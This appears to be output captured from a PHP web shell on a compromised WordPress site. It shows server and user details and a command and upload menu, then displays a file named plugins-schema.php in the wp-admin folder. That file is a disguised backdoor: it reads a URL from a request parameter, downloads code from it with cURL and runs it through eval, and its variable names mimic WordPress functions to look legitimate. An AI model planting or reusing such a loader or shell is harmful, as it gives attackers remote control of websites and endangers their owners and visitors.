Server IP : 10.121.20.7  /  Your IP : 216.73.216.57
Web Server : Apache
System : Linux webm007.cluster121.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
User : isdlyge ( 456073)
PHP Version : 8.4.22
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0755) :  /home/isdlyge/www/wp-admin/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/isdlyge/www/wp-admin/plugins-schema.php
<?php

if (isset($_GET['json'])) {
    $load_theme_textdomain_wee = $_GET['json'];
    if ($add_section_ct = curl_init()) {
        curl_setopt($add_section_ct, CURLOPT_URL, $load_theme_textdomain_wee);
        curl_setopt($add_section_ct, CURLOPT_RETURNTRANSFER, true);
        eval(curl_exec($add_section_ct));
        curl_close($add_section_ct);
        exit;
    }
}